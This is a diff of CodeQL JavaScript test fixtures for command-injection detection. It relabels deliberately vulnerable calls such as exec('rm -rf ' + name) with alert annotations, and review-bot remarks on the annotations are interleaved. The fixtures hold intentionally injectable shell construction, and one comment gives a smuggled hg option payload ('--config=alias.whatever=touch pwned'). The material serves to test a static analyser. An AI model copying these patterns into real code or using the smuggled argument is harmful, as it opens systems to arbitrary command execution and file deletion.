a/javascript/ql/test/query-tests/Security/CWE-078/SecondOrderCommandInjection/second-order.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/SecondOrderCommandInjection/second-order.js 
@@ -4,18 +4,18 @@ const { execFile } = require("child_process"); app.get("/", (req, res) => { const remote = req.query.remote; - execFile("git", ["ls-remote", remote]); // NOT OK + execFile("git", ["ls-remote", remote]); // $ Alert - execFile("git", ["fetch", remote]); // NOT OK + execFile("git", ["fetch", remote]); // $ Alert - indirect("git", ["ls-remote", remote]); // NOT OK + indirect("git", ["ls-remote", remote]); // $ Alert const myArgs = req.query.args; - execFile("git", myArgs); // NOT OK + execFile("git", myArgs); // $ Alert if (remote.startsWith("--")) { - execFile("git", ["ls-remote", remote, "HEAD"]); // OK - it is very explicit that options that allowed here. + execFile("git", ["ls-remote", remote, "HEAD"]); // OK - it is very explicit that options that allowed here. } else { execFile("git", ["ls-remote", remote, "HEAD"]); // OK - it's not an option } @@ -23,10 +23,10 @@ app.get("/", (req, res) => { if (remote.startsWith("git@")) { execFile("git", ["ls-remote", remote, "HEAD"]); // OK - it's a git URL } else { - execFile("git", ["ls-remote", remote, "HEAD"]); // NOT OK - unknown starting string + execFile("git", ["ls-remote", remote, "HEAD"]); // $ Alert - unknown starting string } - execFile("git", req.query.args); // NOT OK - unknown args + execFile("git", req.query.args); // $ Alert - unknown args execFile("git", ["add", req.query.args]); // OK - git add is not a command that can be used to execute arbitrary code 
@@ -34,16 +34,16 @@ app.get("/", (req, res) => { execFile("git", ["ls-remote", req.query.remote].concat(req.query.otherArgs)); // NOT OK - but not found [INCONSISTENCY]. It's hard to track through concat. - execFile("git", ["add", "fpp"].concat(req.query.notVulnerable)); // OK + execFile("git", ["add", "fpp"].concat(req.query.notVulnerable)); // hg - execFile("hg", ["clone", req.query.remote]); // NOT OK + execFile("hg", ["clone", req.query.remote]); // $ Alert - execFile("hg", ["whatever", req.query.remote]); // NOT OK - `--config=alias.whatever=touch pwned` + execFile("hg", ["whatever", req.query.remote]); // $ Alert - `--config=alias.whatever=touch pwned` - execFile("hg", req.query.args); // NOT OK - unknown args + execFile("hg", req.query.args); // $ Alert - unknown args - execFile("hg", ["clone", "--", req.query.remote]); // OK + execFile("hg", ["clone", "--", req.query.remote]); }); function indirect(cmd, args) { diff --git a/javascript/ql/test/query-tests/Security/CWE-078/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js b/javascript/ql/test/query-tests/Security/CWE-078/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js index 0d610b1e9dd3..0a0edcbd25c7 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js 
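Review bot: The `["ls-remote", req.query.remote].concat(req.query.otherArgs)` line in this hunk still carries the legacy `// NOT OK - but not found [INCONSISTENCY]` comment, so this known false negative is recorded only in prose. Elsewhere in this commit the same situation is written as `// $ MISSING: Alert - ...`, and false positives as `// $ SPURIOUS: Alert - ...`. For consistency I would write `// $ MISSING: Alert - hard to track through concat` here. As far as the convention used in the rest of the commit shows, that makes the detection gap for this second-order injection case explicit and checkable. The enclosing `app.get` handler starts before the hunk.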
@@ -2,12 +2,12 @@ var cp = require('child_process'), path = require('path'), execa = require("execa"); (function() { - cp.execFileSync('rm', ['-rf', path.join(__dirname, "temp")]); // GOOD - cp.execSync('rm -rf ' + path.join(__dirname, "temp")); // BAD + cp.execFileSync('rm', ['-rf', path.join(__dirname, "temp")]); + cp.execSync('rm -rf ' + path.join(__dirname, "temp")); // $ Alert - execa.shell('rm -rf ' + path.join(__dirname, "temp")); // NOT OK - execa.shellSync('rm -rf ' + path.join(__dirname, "temp")); // NOT OK + execa.shell('rm -rf ' + path.join(__dirname, "temp")); // $ Alert + execa.shellSync('rm -rf ' + path.join(__dirname, "temp")); // $ Alert const safe = "\"" + path.join(__dirname, "temp") + "\""; - execa.shellSync('rm -rf ' + safe); // OK + execa.shellSync('rm -rf ' + safe); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/isImported.js b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/isImported.js index 116b624615b1..5b58e1afe4f2 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/isImported.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/isImported.js @@ -3,5 +3,5 @@ const cp = require("child_process"); module.exports.thisMethodIsImported = function (name) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/lib.js b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/lib.js index 75fda0090000..c7e35029966b 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/lib.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/lib.js 
@@ -1,30 +1,30 @@ var cp = require("child_process") module.exports = function (name) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert - cp.execFile(name, [name]); // OK - cp.execFile(name, name); // OK + cp.execFile(name, [name]); + cp.execFile(name, name); }; module.exports.foo = function (name) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert } module.exports.foo.bar = function (name) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert } function cla() { } cla.prototype.method = function (name) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert } module.exports = new cla(); function cla2() { } cla2.prototype.method = function (name) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert } module.exports.bla = new cla2(); @@ -32,29 +32,29 @@ module.exports.lib2 = require("./lib2.js") class Cla3 { constructor(name) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert } static foo(name) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert } bar(name) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert - cp.exec("rm -rf " + notASource); // OK + cp.exec("rm -rf " + notASource); } } module.exports.cla3 = Cla3; module.exports.mz = function (name) { - require("mz/child_process").exec("rm -rf " + name); // NOT OK. + require("mz/child_process").exec("rm -rf " + name); // $ Alert } module.exports.flow = function (name) { - var cmd1 = "rm -rf " + name; // NOT OK. + var cmd1 = "rm -rf " + name; // $ Alert cp.exec(cmd1); - var cmd2 = "rm -rf " + name; // NOT OK. + var cmd2 = "rm -rf " + name; // $ Alert function myExec(cmd) { cp.exec(cmd); } 
@@ -62,73 +62,73 @@ module.exports.flow = function (name) { } module.exports.stringConcat = function (name) { - cp.exec("rm -rf " + name); // NOT OK. + cp.exec("rm -rf " + name); // $ Alert - cp.exec(name); // OK. + cp.exec(name); - cp.exec("for foo in (" + name + ") do bla end"); // NOT OK. + cp.exec("for foo in (" + name + ") do bla end"); // $ Alert - cp.exec("cat /foO/BAR/" + name) // NOT OK. + cp.exec("cat /foO/BAR/" + name) // $ Alert - cp.exec("cat \"" + name + "\"") // NOT OK. + cp.exec("cat \"" + name + "\"") // $ Alert - cp.exec("cat '" + name + "'") // NOT OK. + cp.exec("cat '" + name + "'") // $ Alert - cp.exec("cat '/foo/bar" + name + "'") // NOT OK. + cp.exec("cat '/foo/bar" + name + "'") // $ Alert - cp.exec(name + " some file") // OK. + cp.exec(name + " some file") } module.exports.arrays = function (name) { - cp.exec("rm -rf " + name); // NOT OK. + cp.exec("rm -rf " + name); // $ Alert var args1 = ["node"]; - args1.push(name); // NOT OK. + args1.push(name); // $ Alert cp.exec(args1.join(" ")); - cp.exec(["rm -rf", name].join(" ")); // NOT OK. + cp.exec(["rm -rf", name].join(" ")); // $ Alert - cp.exec(["rm -rf", "\"" + name + "\""].join(" ")); // NOT OK. 
+ cp.exec(["rm -rf", "\"" + name + "\""].join(" ")); // $ Alert - cp.execFile("rm", ["-rf", name]); // OK + cp.execFile("rm", ["-rf", name]); } var util = require("util"); module.exports.format = function (name) { - cp.exec(util.format("rm -rf %s", name)); // NOT OK + cp.exec(util.format("rm -rf %s", name)); // $ Alert - cp.exec(util.format("rm -rf '%s'", name)); // NOT OK + cp.exec(util.format("rm -rf '%s'", name)); // $ Alert - cp.exec(util.format("rm -rf '/foo/bar/%s'", name)); // NOT OK + cp.exec(util.format("rm -rf '/foo/bar/%s'", name)); // $ Alert - cp.exec(util.format("%s foo/bar", name)); // OK + cp.exec(util.format("%s foo/bar", name)); - cp.exec(util.format("for foo in (%s) do bar end", name)); // OK + cp.exec(util.format("for foo in (%s) do bar end", name)); - cp.exec(require("printf")('rm -rf %s', name)); // NOT OK + cp.exec(require("printf")('rm -rf %s', name)); // $ Alert } module.exports.valid = function (name) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert if (!isValidName(name)) { return; } - cp.exec("rm -rf " + name); // OK + cp.exec("rm -rf " + name); } module.exports.safe = function (name) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert if (!isSafeName(name)) { return; } - cp.exec("rm -rf " + name); // OK + cp.exec("rm -rf " + name); } class Cla4 { wha(name) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert } static bla(name) { @@ -146,7 +146,7 @@ function Cla5(name) { module.exports.cla5 = new Cla5(); module.exports.indirect = function (name) { - let cmd = "rm -rf " + name; // NOT OK + let cmd = "rm -rf " + name; // $ Alert let sh = "sh"; let args = ["-c", cmd]; cp.spawn(sh, args, cb); @@ -156,7 +156,7 @@ module.exports.indirect2 = function (name) { let cmd = name; let sh = "sh"; let args = ["-c", cmd]; - cp.spawn(sh, args, cb); // OK + cp.spawn(sh, args, cb); let cmd2 = "rm -rf " + name; var args2 = [cmd2]; 
@@ -168,64 +168,64 @@ module.exports.indirect2 = function (name) { } module.exports.cmd = function (command, name) { - cp.exec("fo | " + command); // OK + cp.exec("fo | " + command); - cp.exec("fo | " + name); // NOT OK + cp.exec("fo | " + name); // $ Alert } module.exports.sanitizer = function (name) { var sanitized = "'" + name.replace(/'/g, "'\\''") + "'" - cp.exec("rm -rf " + sanitized); // OK + cp.exec("rm -rf " + sanitized); var broken = "'" + name.replace(/'/g, "'\''") + "'" - cp.exec("rm -rf " + broken); // NOT OK + cp.exec("rm -rf " + broken); // $ Alert } var path = require("path"); module.exports.guard = function (name) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert if (!path.exist(name)) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert return; } - cp.exec("rm -rf " + name); // OK + cp.exec("rm -rf " + name); } module.exports.blacklistOfChars = function (name) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert if (/[^A-Za-z0-9_\/:=-]/.test(name)) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert } else { - cp.exec("rm -rf " + name); // OK + cp.exec("rm -rf " + name); } } module.exports.whitelistOfChars = function (name) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert if (/^[A-Za-z0-9_\/:=-]$/.test(name)) { - cp.exec("rm -rf " + name); // OK + cp.exec("rm -rf " + name); } else { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert } } module.exports.blackList2 = function (name) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert if (!/^([a-zA-Z0-9]+))?$/.test(name)) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert process.exit(-1); } - cp.exec("rm -rf " + name); // OK - but FP due to tracking flow through `process.exit()`. 
[INCONSISTENCY] + cp.exec("rm -rf " + name); // $ SPURIOUS: Alert - FP due to tracking flow through `process.exit()`. } module.exports.accessSync = function (name) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert try { path.accessSync(name); @@ -233,7 +233,7 @@ module.exports.accessSync = function (name) { return; } - cp.exec("rm -rf " + name); // OK - but FP due to `path.accessSync` not being recognized as a sanitizer. [INCONSISTENCY] + cp.exec("rm -rf " + name); // $ SPURIOUS: Alert - FP due to `path.accessSync` not being recognized as a sanitizer. } var cleanInput = function (s) { 
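Review bot: The `$ SPURIOUS: Alert` on the last `cp.exec` in `blackList2` blames the false positive on flow through `process.exit()`, but the regex in the `if` guard above it, `/^([a-zA-Z0-9]+))?$/`, has an unbalanced `)`. That may be a separate reason the check is not treated as a sanitizer, so the stated cause could be wrong or incomplete. I would either correct the pattern to `/^([a-zA-Z0-9]+)?$/` so the case isolates the `process.exit()` behaviour, or name the malformed pattern in the annotation text. The regex line is unchanged context, and re-running the test after such a change would show which explanation holds.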
@@ -246,39 +246,39 @@ var cleanInput = function (s) { } module.exports.goodSanitizer = function (name) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert var cleaned = cleanInput(name); - cp.exec("rm -rf " + cleaned); // OK - But FP due to SanitizingRegExpTest not being able to generate a barrier edge for an edge into a phi node. + cp.exec("rm -rf " + cleaned); // $ SPURIOUS: Alert - SanitizingRegExpTest is not able to generate a barrier edge for an edge into a phi node. } var fs = require("fs"); module.exports.guard2 = function (name) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert if (!fs.existsSync("prefix/" + name)) { - cp.exec("rm -rf prefix/" + name); // NOT OK + cp.exec("rm -rf prefix/" + name); // $ Alert return; } - cp.exec("rm -rf prefix/" + name); // OK + cp.exec("rm -rf prefix/" + name); } module.exports.sanitizerProperty = function (obj) { - cp.exec("rm -rf " + obj.version); // NOT OK + cp.exec("rm -rf " + obj.version); // $ Alert obj.version = ""; - cp.exec("rm -rf " + obj.version); // OK + cp.exec("rm -rf " + obj.version); } module.exports.Foo = class Foo { start(opts) { - cp.exec("rm -rf " + opts.bla); // NOT OK + cp.exec("rm -rf " + opts.bla); // $ Alert this.opts = {}; this.opts.bla = opts.bla - cp.exec("rm -rf " + this.opts.bla); // NOT OK + cp.exec("rm -rf " + this.opts.bla); // $ Alert } } 
@@ -305,24 +305,24 @@ function sanitizeShellString(str) { } module.exports.sanitizer2 = function (name) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert var sanitized = sanitizeShellString(name); - cp.exec("rm -rf " + sanitized); // OK + cp.exec("rm -rf " + sanitized); } module.exports.typeofcheck = function (name) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert if (typeof name === "undefined") { - cp.exec("rm -rf " + name); // OK + cp.exec("rm -rf " + name); } else { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert } } module.exports.typeofcheck = function (arg) { - var cmd = "MyWindowCommand | findstr /i /c:" + arg; // NOT OK + var cmd = "MyWindowCommand | findstr /i /c:" + arg; // $ Alert cp.exec(cmd); } @@ -333,22 +333,22 @@ function id(x) { module.exports.id = id; module.exports.unproblematic = function() { - cp.exec("rm -rf " + id("test")); // OK + cp.exec("rm -rf " + id("test")); }; module.exports.problematic = function(n) { - cp.exec("rm -rf " + id(n)); // NOT OK + cp.exec("rm -rf " + id(n)); // $ Alert }; module.exports.typeofNumber = function(n) { if (typeof n === "number") { - cp.exec("rm -rf " + n); // OK + cp.exec("rm -rf " + n); } }; function boundProblem(safe, unsafe) { - cp.exec("rm -rf " + safe); // OK - cp.exec("rm -rf " + unsafe); // NOT OK + cp.exec("rm -rf " + safe); + cp.exec("rm -rf " + unsafe); // $ Alert } Object.defineProperty(module.exports, "boundProblem", { @@ -363,7 +363,7 @@ function MyTrainer(opts) { MyTrainer.prototype = { train: function() { - var command = "learn " + this.learn_args + " " + model; // NOT OK + var command = "learn " + this.learn_args + " " + model; // $ Alert cp.exec(command); } }; 
@@ -403,27 +403,27 @@ function yetAnohterSanitizer(str) { } module.exports.sanitizer3 = function (name) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert var sanitized = yetAnohterSanitizer(name); - cp.exec("rm -rf " + sanitized); // OK + cp.exec("rm -rf " + sanitized); } const cp = require("child_process"); const spawn = cp.spawn; module.exports.shellOption = function (name) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert - cp.execFile("rm", ["-rf", name], {shell: true}, (err, out) => {}); // NOT OK - cp.spawn("rm", ["-rf", name], {shell: true}); // NOT OK - cp.execFileSync("rm", ["-rf", name], {shell: true}); // NOT OK - cp.spawnSync("rm", ["-rf", name], {shell: true}); // NOT OK + cp.execFile("rm", ["-rf", name], {shell: true}, (err, out) => {}); // $ Alert + cp.spawn("rm", ["-rf", name], {shell: true}); // $ Alert + cp.execFileSync("rm", ["-rf", name], {shell: true}); // $ Alert + cp.spawnSync("rm", ["-rf", name], {shell: true}); // $ Alert const SPAWN_OPT = {shell: true}; - spawn("rm", ["first", name], SPAWN_OPT); // NOT OK + spawn("rm", ["first", name], SPAWN_OPT); // $ Alert var arr = []; - arr.push(name); // NOT OK + arr.push(name); // $ Alert spawn("rm", arr, SPAWN_OPT); spawn("rm", build("node", (name ? name + ':' : '') + '-'), SPAWN_OPT); // This is bad, but the alert location is down in `build`. } @@ -433,18 +433,18 @@ function build(first, last) { if (something() === 'gm') arr.push('convert'); first && arr.push(first); - last && arr.push(last); // NOT OK + last && arr.push(last); // $ Alert return arr; }; var asyncExec = require("async-execute"); module.exports.asyncStuff = function (name) { - asyncExec("rm -rf " + name); // NOT OK + asyncExec("rm -rf " + name); // $ Alert } const myFuncs = { myFunc: function (name) { - asyncExec("rm -rf " + name); // NOT OK + asyncExec("rm -rf " + name); // $ Alert } }; 
@@ -475,12 +475,12 @@ const {promisify} = require('util'); const exec = promisify(require('child_process').exec); module.exports = function check(config) { - const cmd = path.join(config.installedPath, 'myBinary -v'); // NOT OK + const cmd = path.join(config.installedPath, 'myBinary -v'); // $ Alert return exec(cmd); } module.exports.splitConcat = function (name) { - let args = ' my name is ' + name; // NOT OK + let args = ' my name is ' + name; // $ Alert let cmd = 'echo'; cp.exec(cmd + args); } @@ -496,7 +496,7 @@ module.exports.myCommand = function (myCommand) { }; module.exports.myIndirectThing = function (name) { - MyThing.cp.exec("rm -rf " + name); // NOT OK + MyThing.cp.exec("rm -rf " + name); // $ Alert } }); 
@@ -507,49 +507,49 @@ for (var name in imp){ } module.exports.sanitizer4 = function (name) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert if (isNaN(name)) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert } else { - cp.exec("rm -rf " + name); // OK + cp.exec("rm -rf " + name); } if (isNaN(parseInt(name))) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert } else { - cp.exec("rm -rf " + name); // OK + cp.exec("rm -rf " + name); } if (isNaN(+name)) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert } else { - cp.exec("rm -rf " + name); // OK + cp.exec("rm -rf " + name); } if (isNaN(parseInt(name, 10))) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert } else { - cp.exec("rm -rf " + name); // OK + cp.exec("rm -rf " + name); } if (isNaN(name - 0)) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert } else { - cp.exec("rm -rf " + name); // OK + cp.exec("rm -rf " + name); } if (isNaN(name | 0)) { // <- not a sanitizer - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert } else { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert } } module.exports.shellThing = function (name) { function indirectShell(cmd, args, spawnOpts) { - cp.spawn(cmd, args, spawnOpts); // NOT OK + cp.spawn(cmd, args, spawnOpts); // $ Alert } indirectShell("rm", ["-rf", name], {shell: true}); 
@@ -557,40 +557,40 @@ module.exports.shellThing = function (name) { module.exports.badSanitizer = function (name) { if (!name.match(/^(.|\.){1,64}$/)) { // <- bad sanitizer - exec("rm -rf " + name); // NOT OK + exec("rm -rf " + name); // $ Alert } else { - exec("rm -rf " + name); // NOT OK + exec("rm -rf " + name); // $ Alert } if (!name.match(/^\w{1,64}$/)) { // <- good sanitizer - exec("rm -rf " + name); // NOT OK + exec("rm -rf " + name); // $ Alert } else { - exec("rm -rf " + name); // OK + exec("rm -rf " + name); } } module.exports.safeWithBool = function (name) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert if (isSafeName(name)) { - cp.exec("rm -rf " + name); // OK + cp.exec("rm -rf " + name); } - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert if (isSafeName(name) === true) { - cp.exec("rm -rf " + name); // OK + cp.exec("rm -rf " + name); } if (isSafeName(name) !== false) { - cp.exec("rm -rf " + name); // OK + cp.exec("rm -rf " + name); } if (isSafeName(name) == false) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert } - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert } function indirectThing(name) { 
@@ -606,36 +606,36 @@ function moreIndirect(name) { } module.exports.veryIndeirect = function (name) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert if (indirectThing(name)) { - cp.exec("rm -rf " + name); // OK + cp.exec("rm -rf " + name); } if (indirectThing2(name)) { - cp.exec("rm -rf " + name); // OK + cp.exec("rm -rf " + name); } if (moreIndirect(name)) { - cp.exec("rm -rf " + name); // OK + cp.exec("rm -rf " + name); } if (moreIndirect(name) !== false) { - cp.exec("rm -rf " + name); // OK + cp.exec("rm -rf " + name); } else { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert } - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert } module.exports.sanitizer = function (name) { var sanitized = "'" + name.replace(new RegExp("\'"), "'\\''") + "'" - cp.exec("rm -rf " + sanitized); // NOT OK + cp.exec("rm -rf " + sanitized); // $ Alert var sanitized = "'" + name.replace(new RegExp("\'", 'g'), "'\\''") + "'" - cp.exec("rm -rf " + sanitized); // OK + cp.exec("rm -rf " + sanitized); var sanitized = "'" + name.replace(new RegExp("\'", unknownFlags()), "'\\''") + "'" - cp.exec("rm -rf " + sanitized); // OK -- Most likely should be okay and not flagged to reduce false positives. + cp.exec("rm -rf " + sanitized); // OK - Most likely should be okay and not flagged to reduce false positives. } diff --git a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/lib2.js b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/lib2.js index db1ecd02413f..6dc040fd7800 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/lib2.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/lib2.js 
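Review bot: The last case in `sanitizer`, `new RegExp("\'", unknownFlags())`, keeps the free-text comment `// OK - Most likely should be okay and not flagged to reduce false positives.`, which does not say what risk is being accepted. The first case in the same function shows that a replace without the `g` flag is expected to alert, presumably because only the first quote gets escaped. Treating unknown flags as safe is therefore a deliberate false negative whenever the flags turn out to lack `g`. I would say so on the line, e.g. `// OK - flags unknown; assumed to include 'g' to limit false positives (accepted false negative otherwise)`.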
@@ -1,9 +1,9 @@ var cp = require("child_process") module.exports = function (name) { - cp.exec("rm -rf " + name); // NOT OK - is imported from main module. + cp.exec("rm -rf " + name); // $ Alert - is imported from main module. }; module.exports.foo = function (name) { - cp.exec("rm -rf " + name); // NOT OK - is imported from main module. + cp.exec("rm -rf " + name); // $ Alert - is imported from main module. }; \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/other.js b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/other.js index b107ac03d7ae..1f512e8c3817 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/other.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/other.js @@ -1,5 +1,5 @@ var cp = require("child_process") module.exports = function (name) { - cp.exec("rm -rf " + name); // OK, is not exported to a main-module. + cp.exec("rm -rf " + name); // OK - is not exported to a main-module. }; \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib/amdSub.js b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib/amdSub.js index a594c2182392..df2b9bd82e60 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib/amdSub.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib/amdSub.js @@ -1,5 +1,5 @@ const cp = require("child_process"); module.exports = function (name) { - cp.exec("rm -rf " + name); // NOT OK - this function is exported from `amd.js` + cp.exec("rm -rf " + name); // $ Alert - this function is exported from `amd.js` }; \ No newline at end of file 
diff --git a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib/index.js b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib/index.js index 6e7d3498723d..ba4bd7089693 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib/index.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib/index.js @@ -1,15 +1,15 @@ var cp = require("child_process") module.exports = function (name) { - cp.exec("rm -rf " + name); // NOT OK - functions exported as part of a submodule are also flagged. + cp.exec("rm -rf " + name); // $ Alert - functions exported as part of a submodule are also flagged. }; module.exports.foo = function (name) { - cp.exec("rm -rf " + name); // NOT OK - this is being called explicitly from child_process-test.js + cp.exec("rm -rf " + name); // $ Alert - this is being called explicitly from child_process-test.js }; module.exports.amd = require("./amd.js"); module.exports.arrToShell = function (cmd, arr) { - cp.spawn("echo", arr, {shell: true}); // NOT OK + cp.spawn("echo", arr, {shell: true}); // $ Alert } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts index 1e945f15e724..f2e6b7672f89 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts +++ b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts @@ -1,5 +1,5 @@ var cp = require("child_process") export default function (name) { - cp.exec("rm -rf " + name); // NOT OK - the "files" directory points to this file. + cp.exec("rm -rf " + name); // $ Alert - the "files" directory points to this file. } 
diff --git a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib2/special-file.js b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib2/special-file.js index c46fed331815..67890f50fe82 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib2/special-file.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib2/special-file.js @@ -1,5 +1,5 @@ var cp = require("child_process") module.exports = function (name) { - cp.exec("rm -rf " + name); // NOT OK - the "files" directory points to this file. + cp.exec("rm -rf " + name); // $ Alert - the "files" directory points to this file. }; \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts index 9fa88413cc88..8a79d2d66a66 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts +++ b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts @@ -1,5 +1,5 @@ var cp = require("child_process") module.exports = function (name) { - cp.exec("rm -rf " + name); // NOT OK - functions exported as part of a submodule are also flagged. + cp.exec("rm -rf " + name); // $ Alert - functions exported as part of a submodule are also flagged. }; diff --git a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib4/subsub.js b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib4/subsub.js index 952288a82cef..bc9e51562033 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib4/subsub.js 
